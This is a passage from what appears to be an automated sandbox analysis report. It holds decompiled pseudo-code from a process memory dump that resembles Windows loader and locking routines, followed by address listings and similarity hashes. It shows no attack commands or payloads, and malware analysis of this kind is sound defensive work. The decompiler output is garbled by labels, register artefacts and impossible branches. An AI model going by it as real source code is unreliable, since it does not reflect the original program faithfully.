E010D2280(_t134, 0x11a8608); 									__eflags =  *0x11a6e48 - _t253; // 0x5eb158 									if(__eflags != 0) { 										L48: 										_t253 = 0; 										__eflags = 0; 										L49: 										E010CFFB0(_t198, _t241, 0x11a8608); 										__eflags = _t253; 										if(_t253 != 0) { 											L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253); 										} 										goto L31; 									} 									 *0x11a6e48 = _t241; 									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1; 									__eflags = _t253; 									if(_t253 != 0) { 										_t57 = _t253 + 0x34; 										 *_t57 =  *(_t253 + 0x34) + 0xffffffff; 										__eflags =  *_t57; 										if( *_t57 == 0) { 											goto L49; 										} 									} 									goto L48; 								} 								L31: 								_t229 = _t241; 								goto L14; 							} 							_v73 = 1; 							_v64 = _t240; 							asm("lock bts dword [esi], 0x0"); 							if(_t275 < 0) { 								_t231 =  *0x11a8608; // 0x0 								while(1) { 									_v60 = _t231; 									__eflags = _t231 & 0x00000001; 									if((_t231 & 0x00000001) != 0) { 										goto L76; 									} 									_t73 = _t231 + 1; // 0x1 									_t210 = _t73; 									asm("lock cmpxchg [edi], ecx"); 									__eflags = _t231 - _t231; 									if(_t231 != _t231) { 										L92: 										_t133 = E010E6B90(_t210,  &_v64); 										_t262 =  *0x11a8608; // 0x0 										L93: 										_t231 = _t262; 										continue; 									} 									_t240 = _v56; 									goto L10; 									L76: 									_t169 = E010EE180(_t133); 									__eflags = _t169; 									if(_t169 != 0) { 										_push(0xc000004b); 										_push(0xffffffff); 										E010F97C0(); 										_t231 = _v68; 									} 									_v72 = 0; 									_v24 =  *( *[fs:0x18] + 0x24); 									_v16 = 3; 									_v28 = 0; 									__eflags = _t231 & 0x00000002; 									if((_t231 & 0x00000002) == 0) { 										_v32 =  &_v36; 										_t174 = _t231 >> 4; 										__eflags = 1 - _t174; 										_v20 = _t174; 										asm("sbb 
ecx, ecx"); 										_t210 = 3 |  &_v36; 										__eflags = _t174; 										if(_t174 == 0) { 											_v20 = 0xfffffffe; 										} 									} else { 										_v32 = 0; 										_v20 = 0xffffffff; 										_v36 = _t231 & 0xfffffff0; 										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007; 										_v72 =  !(_t231 >> 2) & 0xffffff01; 									} 									asm("lock cmpxchg [edi], esi"); 									_t262 = _t231; 									__eflags = _t262 - _t231; 									if(_t262 != _t231) { 										goto L92; 									} else { 										__eflags = _v72; 										if(_v72 != 0) { 											E010F006A(0x11a8608, _t210); 										} 										__eflags =  *0x7ffe036a - 1; 										if(__eflags <= 0) { 											L89: 											_t133 =  &_v16; 											asm("lock btr dword [eax], 0x1"); 											if(__eflags >= 0) { 												goto L93; 											} else { 												goto L90; 											} 											do { 												L90: 												_push(0); 												_push(0x11a8608); 												E010FB180(); 												_t133 = _v24; 												__eflags = _t133 & 0x00000004; 											} while ((_t133 & 0x00000004) == 0); 											goto L93; 										} else { 											_t218 =  *0x11a6904; // 0x400 											__eflags = _t218; 											if(__eflags == 0) { 												goto L89; 											} else { 												goto L87; 											} 											while(1) { 												L87: 												__eflags = _v16 & 0x00000002; 												if(__eflags == 0) { 													goto L89; 												} 												asm("pause"); 												_t218 = _t218 - 1; 												__eflags = _t218; 												if(__eflags != 0) { 													continue; 												} 												goto L89; 											} 											goto L89; 										} 									} 								} 							} 							L10: 							_t229 =  *0x11a6e48; // 0x5eb158 							_v72 = _t229; 							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) { 								E010CFFB0(_t198, 
_t240, 0x11a8608); 								_t253 = _v76; 								goto L29; 							} else { 								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1; 								asm("lock cmpxchg [esi], ecx"); 								_t215 = 1; 								if(1 != 1) { 									while(1) { 										_t246 = _t215 & 0x00000006; 										_t180 = _t215; 										__eflags = _t246 - 2; 										_v56 = _t246; 										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215; 										asm("lock cmpxchg [edi], esi"); 										_t248 = _v56; 										__eflags = _t180 - _t215; 										if(_t180 == _t215) { 											break; 										} 										_t215 = _t180; 									} 									__eflags = _t248 - 2; 									if(_t248 == 2) { 										__eflags = 0; 										E010F00C2(0x11a8608, 0, _t235); 									} 									_t229 = _v72; 								} 								goto L14; 							} 						} 					} 				} 				_t227 = 0; 				_v75 = 0; 				if(_t128 != 0) { 					goto L4; 				} 				goto L2; 			}                        

                                                                            0x010e21ae
                                                                            0x010e21b3
                                                                            0x010e228b
                                                                            0x010e2290
                                                                            0x010e2379
                                                                            0x010e2296
                                                                            0x010e2298
                                                                            0x010e2298
                                                                            0x010e2290
                                                                            0x010e21b9
                                                                            0x010e21be
                                                                            0x010e22a2
                                                                            0x010e22a2
                                                                            0x010e21c4
                                                                            0x010e21c8
                                                                            0x010e21cc
                                                                            0x010e21d0
                                                                            0x010e21d4
                                                                            0x010e21de
                                                                            0x010e21e3
                                                                            0x01125a29
                                                                            0x01125a2c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01125a3b
                                                                            0x00000000
                                                                            0x010e21e9
                                                                            0x010e21e9
                                                                            0x010e21e9
                                                                            0x010e21ee
                                                                            0x010e21f1
                                                                            0x01125a45
                                                                            0x01125a4b
                                                                            0x01125a52
                                                                            0x01125a58
                                                                            0x01125a5d
                                                                            0x01125a5f
                                                                            0x01125a71
                                                                            0x01125a61
                                                                            0x01125a6a
                                                                            0x01125a6a
                                                                            0x01125a76
                                                                            0x01125a79
                                                                            0x01125a7f
                                                                            0x01125a83
                                                                            0x01125a85
                                                                            0x01125a87
                                                                            0x01125a87
                                                                            0x01125a8c
                                                                            0x01125a91
                                                                            0x01125a97
                                                                            0x01125a9f
                                                                            0x01125aa0
                                                                            0x01125aa1
                                                                            0x01125aa6
                                                                            0x01125aab
                                                                            0x01125ab1
                                                                            0x01125ab3
                                                                            0x01125ab9
                                                                            0x01125aca
                                                                            0x01125ad4
                                                                            0x01125ad4
                                                                            0x01125ade
                                                                            0x01125ade
                                                                            0x01125aab
                                                                            0x01125a79
                                                                            0x01125a52
                                                                            0x010e21f7
                                                                            0x010e21f9
                                                                            0x010e21fe
                                                                            0x010e21fe
                                                                            0x010e21e3
                                                                            0x010e2195
                                                                            0x010e236c
                                                                            0x010e2122
                                                                            0x010e2122
                                                                            0x010e2124
                                                                            0x010e2231
                                                                            0x010e2236
                                                                            0x010e2236
                                                                            0x010e2238
                                                                            0x010e2238
                                                                            0x010e2240
                                                                            0x010e2242
                                                                            0x010e2244
                                                                            0x011259fc
                                                                            0x010e218c
                                                                            0x010e218c
                                                                            0x00000000
                                                                            0x010e218c
                                                                            0x010e224a
                                                                            0x010e224f
                                                                            0x010e2256
                                                                            0x010e2304
                                                                            0x010e2309
                                                                            0x010e230f
                                                                            0x010e231e
                                                                            0x010e231e
                                                                            0x010e231e
                                                                            0x010e2320
                                                                            0x010e2325
                                                                            0x010e232a
                                                                            0x010e232c
                                                                            0x010e233e
                                                                            0x010e233e
                                                                            0x00000000
                                                                            0x010e232c
                                                                            0x010e2311
                                                                            0x010e2317
                                                                            0x010e231a
                                                                            0x010e231c
                                                                            0x010e2380
                                                                            0x010e2380
                                                                            0x010e2380
                                                                            0x010e2384
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2386
                                                                            0x00000000
                                                                            0x010e231c
                                                                            0x010e225c
                                                                            0x010e225c
                                                                            0x00000000
                                                                            0x010e225c
                                                                            0x010e212a
                                                                            0x010e2134
                                                                            0x010e2138
                                                                            0x010e213d
                                                                            0x01125858
                                                                            0x01125863
                                                                            0x01125863
                                                                            0x01125867
                                                                            0x0112586a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0112586c
                                                                            0x0112586c
                                                                            0x01125871
                                                                            0x01125875
                                                                            0x01125877
                                                                            0x01125997
                                                                            0x0112599c
                                                                            0x011259a1
                                                                            0x011259a7
                                                                            0x011259a7
                                                                            0x00000000
                                                                            0x011259a7
                                                                            0x0112587d
                                                                            0x00000000
                                                                            0x0112588b
                                                                            0x0112588b
                                                                            0x01125890
                                                                            0x01125892
                                                                            0x01125894
                                                                            0x01125899
                                                                            0x0112589b
                                                                            0x011258a0
                                                                            0x011258a0
                                                                            0x011258aa
                                                                            0x011258b2
                                                                            0x011258b6
                                                                            0x011258be
                                                                            0x011258c6
                                                                            0x011258c9
                                                                            0x0112590d
                                                                            0x01125917
                                                                            0x0112591a
                                                                            0x0112591c
                                                                            0x01125920
                                                                            0x01125928
                                                                            0x0112592a
                                                                            0x0112592c
                                                                            0x0112592e
                                                                            0x0112592e
                                                                            0x011258cb
                                                                            0x011258cd
                                                                            0x011258d8
                                                                            0x011258e0
                                                                            0x011258f4
                                                                            0x011258fe
                                                                            0x011258fe
                                                                            0x0112593a
                                                                            0x0112593e
                                                                            0x01125940
                                                                            0x01125942
                                                                            0x00000000
                                                                            0x01125944
                                                                            0x01125944
                                                                            0x01125949
                                                                            0x0112594e
                                                                            0x0112594e
                                                                            0x01125953
                                                                            0x0112595b
                                                                            0x01125976
                                                                            0x01125976
                                                                            0x0112597a
                                                                            0x0112597f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01125981
                                                                            0x01125981
                                                                            0x01125981
                                                                            0x01125983
                                                                            0x01125988
                                                                            0x0112598d
                                                                            0x01125991
                                                                            0x01125991
                                                                            0x00000000
                                                                            0x0112595d
                                                                            0x0112595d
                                                                            0x01125963
                                                                            0x01125965
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01125967
                                                                            0x01125967
                                                                            0x0112596b
                                                                            0x0112596d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0112596f
                                                                            0x01125971
                                                                            0x01125971
                                                                            0x01125974
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01125974
                                                                            0x00000000
                                                                            0x01125967
                                                                            0x0112595b
                                                                            0x01125942
                                                                            0x01125863
                                                                            0x010e2143
                                                                            0x010e2143
                                                                            0x010e2149
                                                                            0x010e214f
                                                                            0x010e22f1
                                                                            0x010e22f6
                                                                            0x00000000
                                                                            0x010e2173
                                                                            0x010e2173
                                                                            0x010e217d
                                                                            0x010e2181
                                                                            0x010e2186
                                                                            0x011259ae
                                                                            0x011259b2
                                                                            0x011259b5
                                                                            0x011259b7
                                                                            0x011259ba
                                                                            0x011259cd
                                                                            0x011259d1
                                                                            0x011259d5
                                                                            0x011259d9
                                                                            0x011259db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x011259dd
                                                                            0x011259dd
                                                                            0x011259e1
                                                                            0x011259e4
                                                                            0x011259e7
                                                                            0x011259ee
                                                                            0x011259ee
                                                                            0x011259f3
                                                                            0x011259f3
                                                                            0x00000000
                                                                            0x010e2186
                                                                            0x010e214f
                                                                            0x010e2106
                                                                            0x010e2266
                                                                            0x010e20d8
                                                                            0x010e20da
                                                                            0x010e20e0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 792e5ef4bdf441a016b0ca81af0b262ada71c6c609de443437bbd9a571e4e31d
                                                                            • Instruction ID: 12f3680c72ecb418832f1db0ed9e1bfb3a9ba79120ad0f81dc3120609f974173
                                                                            • Opcode Fuzzy Hash: 792e5ef4bdf441a016b0ca81af0b262ada71c6c609de443437bbd9a571e4e31d
                                                                            • Instruction Fuzzy Hash: 87F159316083119FEB6ACF2DC4847AE7BEABF85324F08855DE9D59B281D774D841CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
                                                                                                                                  E010CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) { 				signed int _v8; 				intOrPtr _v20; 				signed int _v36; 				intOrPtr* _v40; 				signed int _v44; 				signed int _v48; 				signed char _v52; 				signed int _v60; 				signed int _v64; 				signed int _v68; 				signed int _v72; 				signed int _v76; 				intOrPtr _v80; 				signed int _v84; 				intOrPtr _v100; 				intOrPtr _v104; 				signed int _v108; 				signed int _v112; 				signed int _v116; 				intOrPtr _v120; 				signed int _v132; 				char _v140; 				char _v144; 				char _v157; 				signed int _v164; 				signed int _v168; 				signed int _v169; 				intOrPtr _v176; 				signed int _v180; 				signed int _v184; 				intOrPtr _v188; 				signed int _v192; 				signed int _v200; 				signed int _v208; 				intOrPtr* _v212; 				char _v216; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				signed int _t204; 				signed int _t206; 				void* _t208; 				signed int _t211; 				signed int _t216; 				intOrPtr _t217; 				intOrPtr* _t218; 				signed int _t226; 				signed int _t239; 				signed int* _t247; 				signed int _t249; 				void* _t252; 				signed int _t256; 				signed int _t269; 				signed int _t271; 				signed int _t277; 				signed int _t279; 				intOrPtr _t283; 				signed int _t287; 				signed int _t288; 				void* _t289; 				signed char _t290; 				signed int _t292; 				signed int* _t293; 				unsigned int _t297; 				signed int _t306; 				signed int _t307; 				signed int _t308; 				signed int _t309; 				signed int _t310; 				intOrPtr _t311; 				intOrPtr _t312; 				signed int _t319; 				signed int _t320; 				signed int* _t324; 				signed int _t337; 				signed int _t338; 				signed int _t339; 				signed int* _t340; 				void* _t341; 				signed int _t344; 				signed int _t348; 				signed int _t349; 				signed int _t351; 				
intOrPtr _t353; 				void* _t354; 				signed int _t356; 				signed int _t358; 				intOrPtr _t359; 				signed int _t361; 				signed int _t363; 				signed short* _t365; 				void* _t367; 				intOrPtr _t369; 				void* _t370; 				signed int _t371; 				signed int _t372; 				void* _t374; 				signed int _t376; 				void* _t384; 				signed int _t387;  				_v8 =  *0x11ad360 ^ _t376; 				_t2 =  &_a20; 				 *_t2 = _a20 & 0x00000001; 				_t287 = _a4; 				_v200 = _a12; 				_t365 = _a8; 				_v212 = _a16; 				_v180 = _a24; 				_v168 = 0; 				_v157 = 0; 				if( *_t2 != 0) { 					__eflags = E010C6600(0x11a52d8); 					if(__eflags == 0) { 						goto L1; 					} else { 						_v188 = 6; 					} 				} else { 					L1: 					_v188 = 9; 				} 				if(_t365 == 0) { 					_v164 = 0; 					goto L5; 				} else { 					_t363 =  *_t365 & 0x0000ffff; 					_t341 = _t363 + 1; 					if((_t365[1] & 0x0000ffff) < _t341) { 						L109: 						__eflags = _t341 - 0x80; 						if(_t341 <= 0x80) { 							_t281 =  &_v140; 							_v164 =  &_v140; 							goto L114; 						} else { 							_t283 =  *0x11a7b9c; // 0x0 							_t281 = L010D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341); 							_v164 = _t281; 							__eflags = _t281; 							if(_t281 != 0) { 								_v157 = 1; 								L114: 								E010FF3E0(_t281, _t365[2], _t363); 								_t200 = _v164; 								 *((char*)(_v164 + _t363)) = 0; 								goto L5; 							} else { 								_t204 = 0xc000009a; 								goto L47; 							} 						} 					} else { 						_t200 = _t365[2]; 						_v164 = _t200; 						if( *((char*)(_t200 + _t363)) != 0) { 							goto L109; 						} else { 							while(1) { 								L5: 								_t353 = 0; 								_t342 = 0x1000; 								_v176 = 0; 								if(_t287 == 0) { 									break; 								} 								_t384 = _t287 -  *0x11a7b90; // 0x775e0000 								if(_t384 == 0) { 									_t353 =  *0x11a7b8c; // 0x5e2b98 									_v176 = _t353; 									_t320 = ( *(_t353 + 0x50))[8]; 									_v184 = _t320; 								} else { 									
E010D2280(_t200, 0x11a84d8); 									_t277 =  *0x11a85f4; // 0x5e3ef0 									_t351 =  *0x11a85f8 & 1; 									while(_t277 != 0) { 										_t337 =  *(_t277 - 0x50); 										if(_t337 > _t287) { 											_t338 = _t337 | 0xffffffff; 										} else { 											asm("sbb ecx, ecx"); 											_t338 =  ~_t337; 										} 										_t387 = _t338; 										if(_t387 < 0) { 											_t339 =  *_t277; 											__eflags = _t351; 											if(_t351 != 0) { 												__eflags = _t339; 												if(_t339 == 0) { 													goto L16; 												} else { 													goto L118; 												} 												goto L151; 											} else { 												goto L16; 											} 											goto L17; 										} else { 											if(_t387 <= 0) { 												__eflags = _t277; 												if(_t277 != 0) { 													_t340 =  *(_t277 - 0x18); 													_t24 = _t277 - 0x68; // 0x5e3e88 													_t353 = _t24; 													_v176 = _t353; 													__eflags = _t340[3] - 0xffffffff; 													if(_t340[3] != 0xffffffff) { 														_t279 =  *_t340; 														__eflags =  *(_t279 - 0x20) & 0x00000020; 														if(( *(_t279 - 0x20) & 0x00000020) == 0) { 															asm("lock inc dword [edi+0x9c]"); 															_t340 =  *(_t353 + 0x50); 														} 													} 													_v184 = _t340[8]; 												} 											} else { 												_t339 =  *(_t277 + 4); 												if(_t351 != 0) { 													__eflags = _t339; 													if(_t339 == 0) { 														goto L16; 													} else { 														L118: 														_t277 = _t277 ^ _t339; 														goto L17; 													} 													goto L151; 												} else { 													L16: 													_t277 = _t339; 												} 												goto L17; 											} 										} 										goto L25; 										L17: 									} 									L25: 									E010CFFB0(_t287, _t353, 0x11a84d8); 									_t320 = _v184; 									_t342 = 0x1000; 								} 								if(_t353 == 0) { 									break; 					
			} else { 									_t366 = 0; 									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) { 										_t288 = _v164; 										if(_t353 != 0) { 											_t342 = _t288; 											_t374 = E0110CC99(_t353, _t288, _v200, 1,  &_v168); 											if(_t374 >= 0) { 												if(_v184 == 7) { 													__eflags = _a20; 													if(__eflags == 0) { 														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000; 														if(__eflags != 0) { 															_t271 = E010C6600(0x11a52d8); 															__eflags = _t271; 															if(__eflags == 0) { 																_t342 = 0; 																_v169 = _t271; 																_t374 = E010C7926( *(_t353 + 0x50), 0,  &_v169); 															} 														} 													} 												} 												if(_t374 < 0) { 													_v168 = 0; 												} else { 													if( *0x11ab239 != 0) { 														_t342 =  *(_t353 + 0x18); 														E0113E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168); 													} 													if( *0x11a8472 != 0) { 														_v192 = 0; 														_t342 =  *0x7ffe0330; 														_t361 =  *0x11ab218; // 0x0 														asm("ror edi, cl"); 														 *0x11ab1e0( &_v192, _t353, _v168, 0, _v180); 														 *(_t361 ^  *0x7ffe0330)(); 														_t269 = _v192; 														_t353 = _v176; 														__eflags = _t269; 														if(__eflags != 0) { 															_v168 = _t269; 														} 													} 												} 											} 											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) { 												_t366 = 0xc000007a; 											} 											_t247 =  *(_t353 + 0x50); 											if(_t247[3] == 0xffffffff) { 												L40: 												if(_t366 == 0xc000007a) { 													__eflags = _t288; 													if(_t288 == 0) { 														goto L136; 													} else { 														_t366 = 0xc0000139; 													} 													goto L54; 												} 											} else { 												_t249 =  *_t247; 												if(( *(_t249 - 
0x20) & 0x00000020) != 0) { 													goto L40; 												} else { 													_t250 = _t249 | 0xffffffff; 													asm("lock xadd [edi+0x9c], eax"); 													if((_t249 | 0xffffffff) == 0) { 														E010D2280(_t250, 0x11a84d8); 														_t342 =  *(_t353 + 0x54); 														_t165 = _t353 + 0x54; // 0x54 														_t252 = _t165; 														__eflags =  *(_t342 + 4) - _t252; 														if( *(_t342 + 4) != _t252) { 															L135: 															asm("int 0x29"); 															L136: 															_t288 = _v200; 															_t366 = 0xc0000138; 															L54: 															_t342 = _t288; 															L010F3898(0, _t288, _t366); 														} else { 															_t324 =  *(_t252 + 4); 															__eflags =  *_t324 - _t252; 															if( *_t324 != _t252) { 																goto L135; 															} else { 																 *_t324 = _t342; 																 *(_t342 + 4) = _t324; 																_t293 =  *(_t353 + 0x50); 																_v180 =  *_t293; 																E010CFFB0(_t293, _t353, 0x11a84d8); 																__eflags =  *((short*)(_t353 + 0x3a)); 																if( *((short*)(_t353 + 0x3a)) != 0) { 																	_t342 = 0; 																	__eflags = 0; 																	E010F37F5(_t353, 0); 																} 																E010F0413(_t353); 																_t256 =  *(_t353 + 0x48); 																__eflags = _t256; 																if(_t256 != 0) { 																	__eflags = _t256 - 0xffffffff; 																	if(_t256 != 0xffffffff) { 																		E010E9B10(_t256); 																	} 																} 																__eflags =  *(_t353 + 0x28); 																if( *(_t353 + 0x28) != 0) { 																	_t174 = _t353 + 0x24; // 0x24 																	E010E02D6(_t174); 																} 																L010D77F0( *0x11a7b98, 0, _t353); 																__eflags = _v180 - _t293; 																if(__eflags == 0) { 																	E010EC277(_t293, _t366); 																} 																
_t288 = _v164; 																goto L40; 															} 														} 													} else { 														goto L40; 													} 												} 											} 										} 									} else { 										L010CEC7F(_t353); 										L010E19B8(_t287, 0, _t353, 0); 										_t200 = E010BF4E3(__eflags); 										continue; 									} 								} 								L41: 								if(_v157 != 0) { 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288); 								} 								if(_t366 < 0) { 									L46: 									 *_v212 = _v168; 									_t204 = _t366; 									L47: 									_pop(_t354); 									_pop(_t367); 									_pop(_t289); 									return E010FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367); 								} else { 									_t206 =  *0x11ab2f8; // 0x13f0000 									if((_t206 |  *0x11ab2fc) == 0 || ( *0x11ab2e4 & 0x00000001) != 0) { 										goto L46; 									} else { 										_t297 =  *0x11ab2ec; // 0x100 										_v200 = 0; 										if((_t297 >> 0x00000008 & 0x00000003) == 3) { 											_t355 = _v168; 											_t342 =  &_v208; 											_t208 = E01166B68(_v168,  &_v208, _v168, __eflags); 											__eflags = _t208 - 1; 											if(_t208 == 1) { 												goto L46; 											} else { 												__eflags = _v208 & 0x00000010; 												if((_v208 & 0x00000010) == 0) { 													goto L46; 												} else { 													_t342 = 4; 													_t366 = E01166AEB(_t355, 4,  &_v216); 													__eflags = _t366; 													if(_t366 >= 0) { 														goto L46; 													} else { 														asm("int 0x29"); 														_t356 = 0; 														_v44 = 0; 														_t290 = _v52; 														__eflags = 0; 														if(0 == 0) { 															L108: 															_t356 = 0; 															_v44 = 0; 															goto L63; 														} else { 															__eflags = 0; 															if(0 < 0) { 																goto L108; 															} 															L63: 															_v112 = _t356; 															__eflags = _t356; 										
					if(_t356 == 0) { 																L143: 																_v8 = 0xfffffffe; 																_t211 = 0xc0000089; 															} else { 																_v36 = 0; 																_v60 = 0; 																_v48 = 0; 																_v68 = 0; 																_v44 = _t290 & 0xfffffffc; 																E010CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68); 																_t306 = _v68; 																__eflags = _t306; 																if(_t306 == 0) { 																	_t216 = 0xc000007b; 																	_v36 = 0xc000007b; 																	_t307 = _v60; 																} else { 																	__eflags = _t290 & 0x00000001; 																	if(__eflags == 0) { 																		_t349 =  *(_t306 + 0x18) & 0x0000ffff; 																		__eflags = _t349 - 0x10b; 																		if(_t349 != 0x10b) { 																			__eflags = _t349 - 0x20b; 																			if(_t349 == 0x20b) { 																				goto L102; 																			} else { 																				_t307 = 0; 																				_v48 = 0; 																				_t216 = 0xc000007b; 																				_v36 = 0xc000007b; 																				goto L71; 																			} 																		} else { 																			L102: 																			_t307 =  *(_t306 + 0x50); 																			goto L69; 																		} 																		goto L151; 																	} else { 																		_t239 = L010CEAEA(_t290, _t290, _t356, _t366, __eflags); 																		_t307 = _t239; 																		_v60 = _t307; 																		_v48 = _t307; 																		__eflags = _t307; 																		if(_t307 != 0) { 																			L70: 																			_t216 = _v36; 																		} else { 																			_push(_t239); 																			_push(0x14); 																			_push( &_v144); 																			_push(3); 																			_push(_v44); 																			_push(0xffffffff); 																			_t319 = E010F9730(); 																			_v36 = _t319; 																			__eflags = _t319; 																			if(_t319 
< 0) { 																				_t216 = 0xc000001f; 																				_v36 = 0xc000001f; 																				_t307 = _v60; 																			} else { 																				_t307 = _v132; 																				L69: 																				_v48 = _t307; 																				goto L70; 																			} 																		} 																	} 																} 																L71: 																_v72 = _t307; 																_v84 = _t216; 																__eflags = _t216 - 0xc000007b; 																if(_t216 == 0xc000007b) { 																	L150: 																	_v8 = 0xfffffffe; 																	_t211 = 0xc000007b; 																} else { 																	_t344 = _t290 & 0xfffffffc; 																	_v76 = _t344; 																	__eflags = _v40 - _t344; 																	if(_v40 <= _t344) { 																		goto L150; 																	} else { 																		__eflags = _t307; 																		if(_t307 == 0) { 																			L75: 																			_t217 = 0; 																			_v104 = 0; 																			__eflags = _t366; 																			if(_t366 != 0) { 																				__eflags = _t290 & 0x00000001; 																				if((_t290 & 0x00000001) != 0) { 																					_t217 = 1; 																					_v104 = 1; 																				} 																				_t290 = _v44; 																				_v52 = _t290; 																			} 																			__eflags = _t217 - 1; 																			if(_t217 != 1) { 																				_t369 = 0; 																				_t218 = _v40; 																				goto L91; 																			} else { 																				_v64 = 0; 																				E010CE9C0(1, _t290, 0, 0,  &_v64); 																				_t309 = _v64; 																				_v108 = _t309; 																				__eflags = _t309; 																				if(_t309 == 0) { 																					goto L143; 																				} else { 																					_t226 =  *(_t309 + 0x18) & 0x0000ffff; 																					__eflags = _t226 - 0x10b; 																					if(_t226 != 0x10b) { 					
																	__eflags = _t226 - 0x20b; 																						if(_t226 != 0x20b) { 																							goto L143; 																						} else { 																							_t371 =  *(_t309 + 0x98); 																							goto L83; 																						} 																					} else { 																						_t371 =  *(_t309 + 0x88); 																						L83: 																						__eflags = _t371; 																						if(_t371 != 0) { 																							_v80 = _t371 - _t356 + _t290; 																							_t310 = _v64; 																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff); 																							_t292 =  *(_t310 + 6) & 0x0000ffff; 																							_t311 = 0; 																							__eflags = 0; 																							while(1) { 																								_v120 = _t311; 																								_v116 = _t348; 																								__eflags = _t311 - _t292; 																								if(_t311 >= _t292) { 																									goto L143; 																								} 																								_t359 =  *((intOrPtr*)(_t348 + 0xc)); 																								__eflags = _t371 - _t359; 																								if(_t371 < _t359) { 																									L98: 																									_t348 = _t348 + 0x28; 																									_t311 = _t311 + 1; 																									continue; 																								} else { 																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359; 																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) { 																										goto L98; 																									} else { 																										__eflags = _t348; 																										if(_t348 == 0) { 																											goto L143; 																										} else { 																											_t218 = _v40; 																											_t312 =  *_t218; 																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8)); 																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) { 																												
_v100 = _t359; 																												_t360 = _v108; 																												_t372 = L010C8F44(_v108, _t312); 																												__eflags = _t372; 																												if(_t372 == 0) { 																													goto L143; 																												} else { 																													_t290 = _v52; 																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E010F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc))); 																													_t307 = _v72; 																													_t344 = _v76; 																													_t218 = _v40; 																													goto L91; 																												} 																											} else { 																												_t290 = _v52; 																												_t307 = _v72; 																												_t344 = _v76; 																												_t369 = _v80; 																												L91: 																												_t358 = _a4; 																												__eflags = _t358; 																												if(_t358 == 0) { 																													L95: 																													_t308 = _a8; 																													__eflags = _t308; 																													if(_t308 != 0) { 																														 *_t308 =  *((intOrPtr*)(_v40 + 4)); 																													} 																													_v8 = 0xfffffffe; 																													_t211 = _v84; 																												} else { 																													_t370 =  *_t218 - _t369 + _t290; 																													 *_t358 = _t370; 																													__eflags = _t370 - _t344; 																													if(_t370 <= _t344) { 																														L149: 																														 *_t358 = 0; 																														goto L150; 																													} else { 																														__eflags = _t307; 																														if(_t307 == 0) { 																															goto L95; 																														} else { 																	
														__eflags = _t370 - _t344 + _t307; 																															if(_t370 >= _t344 + _t307) { 																																goto L149; 																															} else { 																																goto L95; 																															} 																														} 																													} 																												} 																											} 																										} 																									} 																								} 																								goto L97; 																							} 																						} 																						goto L143; 																					} 																				} 																			} 																		} else { 																			__eflags = _v40 - _t307 + _t344; 																			if(_v40 >= _t307 + _t344) { 																				goto L150; 																			} else { 																				goto L75; 																			} 																		} 																	} 																} 															} 															L97: 															 *[fs:0x0] = _v20; 															return _t211; 														} 													} 												} 											} 										} else { 											goto L46; 										} 									} 								} 								goto L151; 							} 							_t288 = _v164; 							_t366 = 0xc0000135; 							goto L41; 						} 					} 				} 				L151: 			}                        

                                                                            0x010cd78b
                                                                            0x010cd7b1
                                                                            0x0111b3c5
                                                                            0x0111b3c5
                                                                            0x010cd7c3
                                                                            0x010cd7ca
                                                                            0x010cd7e5
                                                                            0x010cd7eb
                                                                            0x010cd8eb
                                                                            0x010cd8ed
                                                                            0x00000000
                                                                            0x010cd8f3
                                                                            0x010cd8f3
                                                                            0x010cd8f3
                                                                            0x00000000
                                                                            0x010cd8ed
                                                                            0x010cd7cc
                                                                            0x010cd7cc
                                                                            0x010cd7d2
                                                                            0x00000000
                                                                            0x010cd7d4
                                                                            0x010cd7d4
                                                                            0x010cd7d7
                                                                            0x010cd7df
                                                                            0x0111b3d4
                                                                            0x0111b3d9
                                                                            0x0111b3dc
                                                                            0x0111b3dc
                                                                            0x0111b3df
                                                                            0x0111b3e2
                                                                            0x0111b468
                                                                            0x0111b46d
                                                                            0x0111b46f
                                                                            0x0111b46f
                                                                            0x0111b475
